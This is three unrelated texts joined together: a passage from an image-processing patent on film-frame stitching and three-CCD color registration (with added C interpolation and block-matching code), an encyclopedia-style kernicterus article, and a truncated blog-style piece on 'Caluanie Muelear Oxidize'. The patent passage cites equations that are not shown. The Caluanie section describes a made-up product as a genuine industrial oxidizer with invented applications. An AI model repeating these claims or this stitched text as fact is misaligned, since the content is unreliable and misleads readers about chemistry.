A film-editing apparatus, which is a thirty-fifth embodiment of the present invention, will be described with reference to FIGS. 110 and 111. This apparatus is similar to the thirty-fourth embodiment shown in FIG. 106. The same components as those shown in FIG. 106 are, therefore, designated by the same reference numerals in FIG. 110 and will not be described in detail.

This apparatus is characterized in that each of three parts of an image read from a photographic film 401 is divided into three parts by a half mirror 433, and nine data items representing the resulting nine image parts are combined, thereby reconstructing the original image read from the film 401.

In operation, the image part 425a shown in FIG. 109B, read from the film 401, is applied by an optical system 404 to the half mirror 433. The mirror 433 divides the input image into three, which are applied to three CCDs 432a, 432b, and 432c. The CCDs 432a, 432b, and 432c convert the input three image parts into three data items, which are input to an image pre-synthesizing circuit 434. The circuit 434 combines the three data items into a single data item which represents one of the three parts of the image read from the film 401. The circuit 434 likewise combines two other sets of three data items representing the image parts 425b and 425c shown in FIG. 109B, thereby producing two data items which represent the two other parts of the image read from the photographic film 401.

The three data items produced by the image pre-synthesizing circuit 434 are stored into three frame memories 22a, 22b, and 22c, respectively. These data items are read from the frame memories 22a, 22b, and 22c and input to an image-synthesizing circuit 408. The circuit 408 combines the three input data items in accordance with the displacement data items R and S which a displacement-determining circuit 430 has generated from the counts of counters 428 and 429, as in the thirty-fourth embodiment. A single image identical to the original image is thereby reconstructed. Reconstructed from nine image parts, the resultant image has a resolution higher than that of the image reconstructed by the thirty-fourth embodiment (FIG. 106).

Another film-editing apparatus, which is a thirty-sixth embodiment of the invention, will be described with reference to FIGS. 112 and 113. This apparatus is similar to the thirty-fifth embodiment of FIG. 110. The same components as those shown in FIG. 106 are denoted by the same reference numerals in FIG. 112 and will not be described in detail.
The thirty-sixth embodiment is characterized in that the address signals recorded in the magnetic tracks 426 of the photographic film 401 are used to control a film-feeding mechanism 431 such that the three parts of each frame image recorded on the film 401 are located at the desired positions (i.e., positions A, B, and C specified in FIGS. 109A and 109B) with respect to a CMD 405a. Hence, three address signals are recorded for every frame image.

In this embodiment, the film 401 with the address signals recorded on it is loaded in the film-feeding mechanism 431, and magnetic heads 435a and 435b contacting the film 401 can be moved along the magnetic tracks of the film 401 by means of drive sections 436a and 436b, which are controlled by a controller 33.

In operation, the film 401 loaded in the film-feeding mechanism 431 is taken up under the control of the controller 33. When the magnetic heads 435a and 435b detect the first of the three address signals recorded for every frame image, the mechanism 431 stops the film 401. The first image part is stopped not at the desired position A (FIG. 109A) but at a more forward position, inevitably, because of the inertia of the film-feeding mechanism 431. Nonetheless, the controller 33 controls the drive sections 436a and 436b such that the drive sections move the heads 435a and 435b to the first image part. The distances the heads 435a and 435b are moved are detected by position-determining circuits 437a and 437b, which generate signals representative of these distances. The signals are input to a displacement-determining circuit 430. The circuit 430 calculates a rotation angle R and a parallel displacement S from the input signals. The three image data items, which the CMD 405a produces in the same way as in the thirty-fourth embodiment, are stored into three frame memories 22a, 22b, and 22c and eventually input to an image-synthesizing circuit 408. The circuit 408 combines the three data items into a single image, in accordance with the angle R and the displacement S which have been supplied from the displacement-determining circuit 430.

In the thirty-fourth, thirty-fifth, and thirty-sixth embodiments, a photographic film is intermittently stopped, each time upon counting a predetermined number of address signals read from the film, and the displacement (i.e., a rotation angle R and a parallel displacement S) of each image part with respect to another image part is calculated from the difference between said predetermined number of address signals and the number of address signals counted the moment the film 401 is actually stopped. The data items representing the image parts are corrected in accordance with the displacement data (R and S) and then are combined, thereby reconstructing an image.

In the thirty-fourth, thirty-fifth, and thirty-sixth embodiments, the overlap regions of the image parts are located by various methods, not by processing the data items representing the image parts as in the conventional image processing apparatuses. These embodiments can therefore accurately calculate the displacements of the image parts, without requiring complex components which would raise the manufacturing cost. Further, these embodiments, though simple in structure, can position the image parts with high precision, thereby reconstructing an original image, even if the image parts have low contrast and their relative position cannot be well determined by a correlator. In the thirty-sixth embodiment, wherein address signals of the type shown in FIG.
113 are used, other data pulses can be added between any two adjacent pulses defining the positions at which the film 401 is to be stopped intermittently.

As described above, in the thirty-fourth, thirty-fifth, and thirty-sixth embodiments, the overlap regions of image parts are detected by using the positioning pulses read from the photographic film. These embodiments can therefore reconstruct an original image with high precision.

An image processing apparatus according to a thirty-seventh embodiment of the invention will be described with reference to FIGS. 114 and 115, FIGS. 116A and 116B, and FIGS. 117 to 121.

In the thirty-seventh embodiment, an input optical image is applied through an optical system 502 to a color-separating prism 503. The prism 503 is, for example, a dichroic mirror for separating the input image into a red beam, a green beam, and a blue beam. These beams are applied to three CCDs 503r, 503g, and 503b, respectively. The CCDs 503r, 503g, and 503b are driven by a CCD driver 516 and convert the red beam, the green beam, and the blue beam into image signals. The image signals are input to preamplifiers 504r, 504g, and 504b and are thereby amplified. The amplified signals are supplied to A/D converters 505r, 505g, and 505b, respectively, and are converted thereby to digital signals. The digital signals are input to signal processors (SP) 506r, 506g, and 506b, which perform γ correction, edge emphasis, or the like on the input digital signals. The signals output by the signal processors 506r, 506g, and 506b are stored into frame memories 507r, 507g, and 507b.

The image signals read from the frame memories 507r and 507b are input to interpolation circuits 508r and 508b. The circuits 508r and 508b interpolate each red-pixel signal and each blue-pixel signal which correspond to one green-pixel signal, in accordance with the coefficients read from coefficient memories 509r and 509b, which will be described later.

The interpolation circuits 508r and 508b are identical in structure, and only the circuit 508r will be described in detail. As FIG. 115 shows, the circuit 508r comprises a data-reading circuit 521 and a linear interpolation circuit 522. The circuit 521 reads the values of four pixels, V_b, V_c, V_d, and V_e, from the frame memory 507r in accordance with the coordinates (IC_x, IC_y) read from the coefficient memory 509r. The linear interpolation circuit 522 comprises multipliers 523, 524, 525, and 526 and an adder 527. The multiplier 523 multiplies the pixel value V_b by the interpolation coefficient C_b read from the coefficient memory 509r; the multiplier 524 multiplies the pixel value V_c by the interpolation coefficient C_c read from the coefficient memory 509r; the multiplier 525 multiplies the pixel value V_d by the interpolation coefficient C_d read from the coefficient memory 509r; and the multiplier 526 multiplies the pixel value V_e by the interpolation coefficient C_e read from the coefficient memory 509r. The products output by the multipliers 523, 524, 525, and 526 are added by the adder 527. As a result, the value V_a of the red pixel is interpolated. Namely:

V_a = C_b·V_b + C_c·V_c + C_d·V_d + C_e·V_e

The value of the blue pixel is interpolated by the interpolation circuit 508b in the same way. The red-pixel value and the blue-pixel value, thus interpolated, are input to a PS (Parallel-Serial) converter 510, along with the green-pixel value.
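Written out in software, the circuit 522 performs ordinary bilinear interpolation. The C sketch below assumes an 8-bit single-channel frame buffer and derives the four coefficients from the fractional parts m and p of the real-valued coordinates, matching the construction given for equation (23) later in this embodiment; the function and variable names are ours.

```c
#include <math.h>
#include <stdint.h>

/* Bilinear interpolation at real-valued coordinates (cx, cy).
 * With m, p the fractional parts of cx, cy, the coefficients are
 * Cb = (1-m)(1-p), Cc = m(1-p), Cd = (1-m)p, Ce = mp, and
 * Va = Cb*Vb + Cc*Vc + Cd*Vd + Ce*Ve, i.e., the four multipliers
 * 523-526 followed by the adder 527. */
static double interpolate_pixel(const uint8_t *frame, int stride,
                                double cx, double cy)
{
    int icx = (int)floor(cx), icy = (int)floor(cy);   /* IC_x, IC_y */
    double m = cx - icx, p = cy - icy;
    double vb = frame[icy * stride + icx];            /* pixel B */
    double vc = frame[icy * stride + icx + 1];        /* pixel C */
    double vd = frame[(icy + 1) * stride + icx];      /* pixel D */
    double ve = frame[(icy + 1) * stride + icx + 1];  /* pixel E */
    return (1 - m) * (1 - p) * vb + m * (1 - p) * vc
         + (1 - m) * p * vd + m * p * ve;             /* V_a */
}
```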
The PS converter 510 combines the input pixel values, forming a color image signal, e.g., an NTSC television signal. The color image signal is output to a monitor 511, a printer 512, or a filing device 520. The CCD driver 516, the frame memories 507r, 507g, and 507b, the coefficient memories 509r and 509b, and the PS converter 510 are controlled by a system controller 517.

As shown in FIG. 114B, the apparatus comprises coefficient calculators 513r and 513b. The calculator 513r comprises a correlator 514r and a coefficient-calculating circuit 515r. Similarly, the calculator 513b comprises a correlator 514b and a coefficient-calculating circuit 515b. For the sake of simplicity, only the coefficient calculator 513r will be described. In the coefficient calculator 513r, the correlator 514r detects a parallel vector s and a rotation vector r, which are input to the coefficient-calculating circuit 515r. The circuit 515r calculates coefficients C_b, C_c, C_d, and C_e from the vectors r and s.

The displacement of an image of one color, with respect to an image of any other color, is detected as two factors, i.e., the parallel displacement and the angle of rotation of a given pixel of the color image. To detect the displacement this way, reference areas a_1, a_2, a_3, and a_4 are set in the green image, as is illustrated in FIG. 116A. These areas have centers p_1, p_2, p_3, and p_4, respectively. The reference areas are located symmetrically with respect to a point C, each spaced apart therefrom by a k-pixel distance. As shown in FIG. 116B, search areas b_1, b_2, b_3, and b_4 are set in the red image and the blue image. These areas b_1 to b_4 are searched for the positions corresponding to the reference areas a_1 to a_4. From these positions, displacement vectors V_1, V_2, V_3, and V_4 corresponding to the reference areas a_1 to a_4 are detected. Each of these displacement vectors is defined, as shown in FIG. 117, by a rotation vector r and a parallel vector s measured at position p_1 with respect to the point C, where r₋₉₀ and r₊₉₀ are vectors obtained by rotating the vector r by −90° and +90°, respectively, and θ is the angle of rotation. From equation (13), the vectors s and r can be represented in terms of the displacement vectors; thus, the parallel displacement and the rotation angle can be detected, and the rotation angle θ is obtained from r.

FIG. 118 shows a correlator 514 used in the thirty-seventh embodiment. In the correlator 514, a correlator 530 determines the correlation between the reference area a_1 and the search area b_1. Similarly, a correlator 531 detects the correlation between the reference area a_2 and the search area b_2; a correlator 532, the correlation between the reference area a_3 and the search area b_3; and a correlator 533, the correlation between the reference area a_4 and the search area b_4. The correlators 530, 531, 532, and 533 output the displacement vectors V_1, V_2, V_3, and V_4.

Various methods of determining the correlation between two areas have been proposed. Utilized in this embodiment is the method in which the absolute sum of the values of the pixels defining the first area is compared with that of the values of the pixels defining the second area, a sketch of which follows. The displacement vectors V_1, V_2, V_3, and V_4 are supplied from the correlators 530 to 533 to an SR detector 534.
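Reading that area comparison as a sum-of-absolute-differences search, which is the usual implementation of such a method (our interpretation, not an explicit statement of the embodiment), each of the correlators 530 to 533 behaves like the following C sketch: the reference area is slid over the search area, and the offset with the smallest accumulated difference is taken as the displacement vector.

```c
#include <limits.h>
#include <stdlib.h>
#include <stdint.h>

/* Exhaustive block matching by sum of absolute differences (SAD).
 * `ref` points at the reference area (bw x bh pixels), `img` at the
 * pixel in the search image corresponding to zero displacement; both
 * use the same row stride, and `img` must allow offsets of +-range.
 * The best offset is returned through *best_dx and *best_dy. */
static void match_block(const uint8_t *ref, const uint8_t *img, int stride,
                        int bw, int bh, int range, int *best_dx, int *best_dy)
{
    long best = LONG_MAX;
    for (int dy = -range; dy <= range; dy++)
        for (int dx = -range; dx <= range; dx++) {
            long sad = 0;
            for (int y = 0; y < bh; y++)
                for (int x = 0; x < bw; x++)
                    sad += labs((long)ref[y * stride + x]
                              - (long)img[(y + dy) * stride + (x + dx)]);
            if (sad < best) { best = sad; *best_dx = dx; *best_dy = dy; }
        }
}
```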
The detector 534 performs the operations of equations (16) and (17), detecting a parallel displacement s and a rotation vector r. The rotation vector r is input to a θ detector 535. The detector 535 performs the operations of equations (15) and (18) on the rotation vector r, calculating a rotation angle θ.

The coefficient-calculating circuits 515r and 515b, which are identical and designed to calculate the interpolation coefficients C_b, C_c, C_d, and C_e from the vector r and the angle θ, will be described with reference to FIG. 119. Either coefficient-calculating circuit performs linear interpolation, obtaining the value of a pixel A from the known values of pixels B, C, D, and E. As is evident from FIG. 119, the line FG (broken line) passing through the pixel A crosses the lines BC and DE at points F and G, respectively. Assume BF:FC = DG:GE = m:n, and FA:AG = p:q. Then, the value V_f for the pixel F and the value V_g for the pixel G are:

V_f = n·V_b + m·V_c
V_g = n·V_d + m·V_e

Hence, V_a is given by:

V_a = q·V_f + p·V_g

Setting the inter-pixel distance at "1," then m + n = p + q = 1. Therefore, V_a is calculated as follows:

V_a = qn·V_b + qm·V_c + pn·V_d + pm·V_e    (22)

Comparison of the equation (22) with the equation (13) will show that:

C_b = (1 − m)(1 − p), C_c = m(1 − p), C_d = (1 − m)p, C_e = mp    (23)

The coordinates of the pixel A are (C_x, C_y). Then, the coordinates for the pixels B, C, D, and E can be represented by:

Pixel B = (IC_x, IC_y), Pixel C = (IC_x + 1, IC_y), Pixel D = (IC_x, IC_y + 1), Pixel E = (IC_x + 1, IC_y + 1)

where IC_x is the integral part of C_x, and IC_y is the integral part of C_y. Position X_r in the red image and position X_b in the blue image, which correspond to position X_g in the green image, are identified as:

X_r = R(θ_r)·X_g + S_r    (25)
X_b = R(θ_b)·X_g + S_b    (26)

where S_r is the parallel vector between the red and green images, S_b is the parallel vector between the blue and the green images, θ_r is the rotation angle of the red image, θ_b is the rotation angle of the blue image, and X_r, X_g, X_b are two-dimensional vectors whose elements are an x-coordinate and a y-coordinate. R(θ) is the rotation matrix through the angle θ.

The coefficient-calculating circuits 515r and 515b, which are identical, have the structure illustrated in FIG. 120. As can be understood from FIG. 120, a coordinates-converting circuit 536 performs the operations of equations (25) and (26), outputting the coordinates C_x and C_y (real numbers) for the red and blue images. The coordinates C_x and C_y are input to integration circuits 537 and 538, respectively. The circuits 537 and 538 generate the integral part IC_x of C_x and the integral part IC_y of C_y, respectively. These integral parts IC_x and IC_y are output from the coefficient-calculating circuit and are also supplied to subtracters 539 and 540. The subtracter 539 subtracts IC_x from C_x supplied from the coordinates-converting circuit 536, generating a coefficient m (= C_x − IC_x). The subtracter 540 subtracts IC_y from C_y supplied from the circuit 536, generating a coefficient p (= C_y − IC_y). The values m and p are input to a coefficient calculator 541. The calculator 541 calculates the interpolation coefficients C_b, C_c, C_d, and C_e from the coefficients m and p, by performing the operation of equation (23).

The coefficient memory 509r will be described in detail with reference to FIG. 121; the other coefficient memory 509b will not be described in detail, since it is identical to the memory 509r. As FIG.
121 shows, the coefficient memory 509r comprises memories 551, 552, 553, and 554 for storing the interpolation coefficients C_b, C_c, C_d, and C_e supplied from the coefficient-calculating circuit 515r, and memories 556 and 557 for storing the coordinates IC_x and IC_y supplied from the circuit 515r.

The operation of the thirty-seventh embodiment will now be explained with reference to FIG. 122. The embodiment executes two major steps. The first major step is to detect coefficients by means of the coefficient-calculating sections 513r and 513b and store the coefficients obtained by the sections 513r and 513b into the coefficient memories 509r and 509b. The second major step is to photograph an object to acquire image data. The sections 513r and 513b, which calculate coefficients and therefore are used in the first major step, need not be used in the second major step.

The first major step will be described with reference to FIG. 114. Assume that the object 501 is a test chart bearing a black-and-white image. The red image, green image, and blue image obtained from the black-and-white image are strongly correlated. The displacement the red image has with respect to the green image, and the displacement the blue image has with respect to the green image, can therefore be calculated with high accuracy. It is desirable that the test chart have many spatial-frequency components so that accurate correlation signals may be obtained at various positions.

The test chart 501 is photographed. To be more specific, the distance-measuring system (not shown) adjusts the focal distance of the optical system 502, and the photometer system (not shown) adjusts the exposure time of the CCDs 503r, 503g, and 503b. The optical image of the test chart 501 is applied via the system 502 to the color-separating prism 503. The prism 503 separates the input image into a red beam, a green beam, and a blue beam. The CCDs 503r, 503g, and 503b convert these beams into image signals. The image signals are amplified by the preamplifiers 504r, 504g, and 504b such that the white balance is maintained. The A/D converters 505r, 505g, and 505b convert the amplified signals to digital signals. The signal processors 506r, 506g, and 506b perform γ correction, edge emphasis, or the like on the digital signals. The signals output by the signal processors 506r, 506g, and 506b are stored into the frame memories 507r, 507g, and 507b.

The image signals read from the frame memories 507r and 507g are input to the coefficient calculator 513r. In the calculator 513r, the correlator 514r detects the reference areas a_1, a_2, a_3, and a_4 of the green image, and the search areas b_1, b_2, b_3, and b_4 of the red image. The correlator 514r also detects the parallel vector S_r between the red image and the green image, and a rotation angle θ_r. The vector S_r and the angle θ_r are supplied to the coefficient-calculating circuit 515r. The circuit 515r calculates the coordinates IC_x, IC_y of the red image which correspond to the two-dimensional vector X_g of the green image, and also calculates the interpolation coefficients C_b, C_c, C_d, and C_e. The values output by the circuit 515r are stored at the specified addresses of the coefficient memory 509r. These values define the imaging area of the green image, over which the red image, the green image, and the blue image overlap, as is illustrated in FIG. 122. The imaging area (FIG.
122) is designated by the system controller 517 in accordance with the outputs of the correlators 514r and 514b. Alternatively, the imaging area may be set by a user.

Meanwhile, the image signals read from the frame memories 507g and 507b are input to the coefficient calculator 513b, which is identical in structure to the coefficient calculator 513r. The calculator 513b calculates the displacement between the green image and the blue image, the coordinates IC_x, IC_y of the imaging area of the blue image, and the interpolation coefficients C_b, C_c, C_d, and C_e. The values output by the coefficient-calculating circuit 515b are stored at the specified addresses of the coefficient memory 509b.

Thus, the interpolation coefficients for the imaging area over which the red, green, and blue images overlap are calculated and subsequently stored in the coefficient memories 509r and 509b, thereby completing the first major step of registering coefficients in the memories 509r and 509b.

The first major step is carried out during the manufacture of the image processing apparatus. The coefficients are already stored in the memories 509r and 509b when the apparatus is delivered to a user (i.e., a photographer). Therefore, the coefficient calculators 513r and 513b can be removed from the apparatus after the coefficients have been calculated and registered in the memories 509r and 509b.

The second major step, i.e., photographing an object, will be explained with reference to FIG. 114, on the assumption that the coefficient calculators 513r and 513b have been removed from the apparatus.

First, a photographer frames the image of an object 501 within the imaging area defined above and pushes the shutter-release button (not shown). As a result, the CCDs 503r, 503g, and 503b generate red-image data, green-image data, and blue-image data, respectively. These image data items are stored into the frame memories 507r, 507g, and 507b.

Then, the system controller 517 designates the coordinates of a position of the green image which is located in the imaging area. The coefficients related to the position designated, i.e., the coordinates IC_x and IC_y and the interpolation coefficients C_b, C_c, C_d, and C_e, are read from the coefficient memory 509r and supplied to the interpolation circuit 508r. The red-image data is read from the frame memory 507r in accordance with the coordinates IC_x and IC_y and input to the interpolation circuit 508r. The circuit 508r interpolates the value for the red pixel located at that position of the green image which the system controller 517 has designated.

In the meantime, the coefficients related to the position designated, i.e., the coordinates IC_x and IC_y and the interpolation coefficients C_b, C_c, C_d, and C_e, are read from the coefficient memory 509b and supplied to the interpolation circuit 508b. The blue-image data is read from the frame memory 507b in accordance with the coordinates IC_x and IC_y and input to the interpolation circuit 508b. The circuit 508b interpolates the value for the blue pixel located at that position of the green image which the system controller 517 has designated.

The value of a green pixel is supplied from the frame memory 507g to the PS converter 510, the value of the red pixel is input from the interpolation circuit 508r to the PS converter 510, and the value of the blue pixel is input from the interpolation circuit 508b to the PS converter 510.
The converter 510 combines the three pixel values, forming a color image signal. The color image signal is output to the monitor 511, the printer 512, or the filing device 520.

As can be understood from the foregoing, the thirty-seventh embodiment can provide a three-section color camera which can form a high-resolution color image with no color distortion. Since the interpolation circuits 508r and 508b compensate for the color distortion resulting from the mutual displacement of the CCDs 503r, 503g, and 503b, the positions of the CCDs need not be adjusted as in the conventional apparatus. That is, no registration of solid-state imaging devices is required. Since the image signals produced by the CCDs are corrected, the thirty-seventh embodiment can form a high-resolution color image even if the CCDs are not positioned with precision. Further, the mutual displacement of a red image, a green image, and a blue image can be accurately detected. This is because the red image and the blue image are compared with the green image, which is strongly correlated with both the red image and the blue image.

In the thirty-seventh embodiment, four reference areas are utilized, as shown in FIGS. 116A and 116B, in order to detect the displacement of the red image and the blue image with respect to the green image. Instead, only two reference areas, either the areas a_1 and a_3 or the areas a_2 and a_4, may be used for that purpose. Alternatively, more than four reference areas may be set in the green image.

Moreover, the interpolation circuits 508r and 508b, which perform linear interpolation, may be replaced by circuits designed to effect spline interpolation or sinc interpolation.

Further, the coefficient calculators 513r and 513b may be connected to the camera by means of connectors. In this case, the calculators 513r and 513b can be disconnected from the camera after the coefficients they have calculated are written into the coefficient memories 509r and 509b. The two coefficient calculators 513r and 513b can be replaced by a single calculator of the same type, provided that this calculator can be connected alternately to the correlators 514r and 514b by means of a changeover switch.

Another image processing apparatus, which is a thirty-eighth embodiment of the present invention, will be described with reference to FIG. 123. This embodiment is similar to the thirty-seventh embodiment shown in FIG. 114. The same components as those shown in FIG. 114 are denoted by the same reference numerals in FIG. 123 and will not be described in detail.

The thirty-eighth embodiment is characterized in that rθ memories 560 and 561 are used in place of the coefficient memories 509r and 509b. The memory 560 stores only the vector r and the angle θ output by the correlator 514r, and the memory 561 stores only the vector r and the angle θ output by the correlator 514b. The memories 560 and 561 therefore need only a storage capacity far smaller than that of the memories 509r and 509b, which must store the variety of coefficients calculated by the coefficient-calculating circuits 515r and 515b. In this case, however, it is necessary for the circuits 515r and 515b to calculate the interpolation coefficients and coordinate data in the second major step, i.e., when a picture is actually taken.

An image processing apparatus according to a thirty-ninth embodiment of the invention will be described with reference to FIGS. 124, 125, and 126.
This embodiment is identical to the thirty-seventh embodiment, except for the features shown in FIGS. 124 and 125. The thirty-ninth embodiment is characterized in that less data is stored in each coefficient memory 509 than in the thirty-seventh embodiment and that the apparatus can nonetheless operate at as high a speed as the thirty-seventh embodiment.

As described above, it is possible with the thirty-seventh embodiment to interpolate a position A (C_x, C_y) from sets of coordinates which are presented as real numbers. Since the coordinates of the position A, thus interpolated, are real numbers, there are countless possible interpolation coefficients C_b, C_c, C_d, and C_e. In the thirty-ninth embodiment, it is assumed that one image consists of L×L blocks having the same size, and the interpolation coefficients for the coordinates of the center of each block are used as the interpolation coefficients for that image block. Therefore, L² sets of interpolation coefficients are required in the thirty-ninth embodiment. Serial numbers, or block numbers, "1" to "L²," are assigned to the L² image blocks, respectively. The block numbers and the L² sets of interpolation coefficients are stored in a memory, in one-to-one association.

The thirty-ninth embodiment comprises a coefficient-calculating circuit 515a shown in FIG. 124 and a coefficient memory 509a shown in FIG. 125. As FIG. 124 shows, the coefficient-calculating circuit 515a has a block number calculator 562, which is used in place of the coefficient calculator 541 (FIG. 120). The block number calculator 562 calculates a block number N from the values m and p, where 0 ≤ m < 1 and 0 ≤ p < 1.

As FIG. 125 shows, the coefficient memory 509a comprises memories 563, 564, 565, 566, 567, 568, and 569. The memories 563, 564, and 565 are used to store the coordinate IC_x, the coordinate IC_y, and the block number N, respectively, which the coefficient-calculating circuit 515a has generated. The memories 566, 567, 568, and 569 are provided for storing the interpolation coefficients C_b, C_c, C_d, and C_e, respectively, which are associated with the image blocks. The memories 566, 567, 568, and 569 have L² memory cells each, as compared to the memories used in the thirty-seventh embodiment, which have as many memory cells as the pixels defining the imaging area. Obviously, the storage capacity of the memories 566, 567, 568, and 569 is far smaller than is required in the thirty-seventh embodiment. The storage capacity of each coefficient memory can be reduced further, since the interpolation coefficients for symmetrical pixels are identical.

In the thirty-ninth embodiment, the interpolation circuits process image signals, thereby compensating for the mutual displacement of the images formed by the imaging devices. No mechanical registration of the imaging devices is therefore required. The thirty-ninth embodiment can be applied to a low-cost color image processing apparatus which can form a high-resolution color image, even if its imaging devices are not positioned with high precision.

Additional advantages and modifications will readily occur to those skilled in the art. Therefore, the invention in its broader aspects is not limited to the specific details and representative devices shown and described herein. Accordingly, various modifications may be made without departing from the spirit or scope of the general inventive concept as defined by the appended claims and their equivalents.
* * * * *
Kernicterus

[MRI of the head: hyperintense basal ganglia lesions on T2-weighted images.]

Kernicterus is a bilirubin-induced brain dysfunction. The term was coined in 1904 by Schmorl. Bilirubin is a naturally occurring substance in the body of humans and many other animals, but it is neurotoxic when its concentration in the blood is too high, a condition known as hyperbilirubinemia. Hyperbilirubinemia may cause bilirubin to accumulate in the grey matter of the central nervous system, potentially causing irreversible neurological damage. Depending on the level of exposure, the effects range from clinically unnoticeable to severe brain damage and even death.

When hyperbilirubinemia increases past a mild level, it leads to jaundice, raising the risk of progressing to kernicterus. When this happens in adults, it is usually because of liver problems. Newborns are especially vulnerable to hyperbilirubinemia-induced neurological damage, because in the earliest days of life, the young and still-developing liver is heavily exercised by the breakdown of fetal hemoglobin as it is replaced with adult hemoglobin. Mildly elevated serum bilirubin levels are common in newborns, and neonatal jaundice is not unusual, but bilirubin levels must be carefully monitored in case they start to climb, in which case more aggressive therapy is needed, usually via light therapy but sometimes even via exchange transfusion.

Classification

Acute bilirubin encephalopathy (ABE)

ABE is an acute state of elevated bilirubin in the central nervous system. Clinically, it encompasses a wide range of symptoms. These include lethargy, decreased feeding, hypotonia or hypertonia, a high-pitched cry, spasmodic torticollis, opisthotonus, setting-sun sign, fever, seizures, and even death. If the bilirubin is not rapidly reduced, ABE quickly progresses to chronic bilirubin encephalopathy.

Chronic bilirubin encephalopathy (CBE)

CBE is a chronic state of severe bilirubin-induced neurological lesions. Reduction of bilirubin in this state will not reverse the sequelae. Clinically, manifestations of CBE include:

1. movement disorders: athetoid cerebral palsy and/or dystonia,
2. auditory dysfunction: auditory neuropathy (ANSD),
3. oculomotor impairments: nystagmus, strabismus, impaired upward or downward gaze, and/or cortical visual impairment,
4. dental enamel hypoplasia/dysplasia of the deciduous teeth,
5. gastroesophageal reflux,
6. impaired digestive function.

These impairments are associated with lesions in the basal ganglia, the auditory nuclei of the brain stem, and the oculomotor nuclei of the brain stem.

Subtle bilirubin encephalopathy (SBE)

SBE is a chronic state of mild bilirubin-induced neurological dysfunction. Clinically, this may result in neurological, learning, and movement disorders, isolated hearing loss, and auditory dysfunction.

In the past it was thought that kernicterus (KI) could cause mental retardation. This was assumed because of hearing difficulty, not detectable on a normal audiogram, accompanied by impairments of speech. With advances in technology, this has proven not to be the case, as those living with KI have repeatedly demonstrated their intelligence using augmentative communication devices[citation needed].
Causes

Unconjugated hyperbilirubinemia during the neonatal period describes the history of nearly all individuals who suffer from kernicterus. It is thought that the blood–brain barrier is not fully functional in neonates, and that bilirubin is therefore able to cross the barrier. Moreover, neonates have much higher levels of bilirubin in their blood, for the following reasons:

1. The rapid breakdown of fetal red blood cells immediately prior to birth (and their subsequent replacement by normal adult human red blood cells) releases large amounts of bilirubin. Notably, although the severe anemia of erythroblastosis fetalis is usually the cause of death, many children who barely survive the anemia exhibit permanent mental impairment or damage to motor areas of the brain because of precipitation of bilirubin in the neuronal cells, causing destruction of many of them — the condition called kernicterus.

2. Neonates cannot metabolize and eliminate bilirubin. The sole path for bilirubin elimination is through the uridine diphosphate glucuronosyltransferase isoform 1A1 (UGT1A1) proteins that perform an (SN2 conjugation) reaction called "glucuronidation". This reaction adds a large sugar to the bilirubin and makes it more water-soluble, so it is more readily excreted via the urine and/or the feces. The UGT1A1 enzymes are present, but not active, until several months after birth in the newborn liver. Apparently, this is a developmental compromise, since the maternal liver and placenta perform glucuronidation for the fetus. In the early 1980s, a late-fetal change (30–40 weeks of gestation) in hepatic UGT1A1 (from 0.1% to 1.0% of adult activity levels) and post-natal changes that are related to birth age, not gestational age, were reported. Similar development of activity toward pan-specific substrates was observed, except for serotonin (1A4), where adult activities were observed in fetal (16–25 weeks) and neonatal liver up to 10 days old. More recently, individual UGT isoform development in infants and young children, including two fetal liver samples, was analyzed; pediatric levels of mRNA and protein for UGT1A1 did not differ from those of adults, but activities were lower. Hence, the effects of the developmental delay in UGT1A1 activation have been illuminated over the last 20–30 years. The molecular mechanism(s) for activating UGT1A1 remain unknown.

3. Administration of aspirin to neonates and infants. Aspirin displaces the bilirubin that was non-covalently attached to albumin in the blood stream, thus generating an increased level of free bilirubin which can cross the developing blood–brain barrier. This can be life-threatening.

Bilirubin is known to accumulate in the gray matter of neurological tissue, where it exerts direct neurotoxic effects. It appears that its neurotoxicity is due to mass destruction of neurons by apoptosis and necrosis.

Risk factors

Gilbert's syndrome and G6PD deficiency occurring together especially increase the risk for kernicterus.[1]

Prevention

The only effective way of preventing kernicterus is to lower the serum bilirubin levels, either by phototherapy or by exchange transfusion. Visual inspection is never sufficient; therefore, it is best to use a bilirubinometer or a blood test to determine a baby's risk of developing kernicterus. These numbers can then be plotted on the Bhutani nomogram.

Treatment

Currently no effective treatment exists for kernicterus. Future therapies may include neuroregeneration.
A handful of patients have undergone deep brain stimulation and experienced some benefit. Drugs such as baclofen, clonazepam, and Artane (trihexyphenidyl) are often used to manage the movement disorders associated with kernicterus. Proton pump inhibitors are also used to help with reflux. Cochlear implants and hearing aids have also been known to improve the hearing loss that can come with kernicterus (auditory neuropathy, ANSD).

References

1. Cappellini MD, Di Montemuros FM, Sampietro M, Tavazzi D, Fiorelli G (1999). "The interaction between Gilbert's syndrome and G6PD deficiency influences bilirubin levels". British Journal of Haematology. 104 (4): 928–9. doi:10.1111/j.1365-2141.1999.1331a.x. PMID 10192462.
The Enigmatic World of Caluanie: A Deep Dive into a Lesser-Known Chemical

In the realm of chemicals, few substances have the mystique and enigma of Caluanie Muelear Oxidize. Often overshadowed by more famous compounds such as sulfuric acid or hydrochloric acid, Caluanie warrants a closer look due to its unusual properties and intriguing applications.

What is Caluanie?

Caluanie, known commercially as Caluanie Muelear Oxidize, is a chemical product used primarily as an industrial oxidizer. Its name may not be familiar to the average person, but in certain sectors it is considered an essential tool. The chemical is known for its powerful oxidizing properties, which make it valuable in various industrial processes, including those related to metal processing and waste treatment.

Properties and Applications

One of the most notable characteristics of Caluanie is its potency. It is a highly corrosive substance that can cause severe damage to both living tissue and materials. As such, it must be handled with extreme caution, adhering to strict safety protocols to prevent accidents. Despite its dangerous nature, Caluanie is employed in several industrial applications. It is used in:

1. Metal Processing: Caluanie is used to oxidize metals at various stages of production. This helps purify metals and remove impurities, which is essential for creating high-quality metal products.

2. Waste Treatment: The compound plays a role in breaking down hazardous waste materials, particularly those containing organic compounds. Its oxidizing ability helps neutralize these substances, rendering them less harmful.

3. Chemical Synthesis: In synthetic chemistry, Caluanie is sometimes used as a reagent in chemical reactions. Its strong oxidizing properties make it useful in certain synthetic pathways that require high reactivity.

Safety and Handling

Given its corrosive nature, safety is paramount when dealing with Caluanie. Proper protective equipment, including gloves, goggles, and respiratory protection, is essential. Additionally, it should be stored in appropriate containers and environments to prevent accidental exposure and to ensure safe handling.

The Cultural and Historical Context

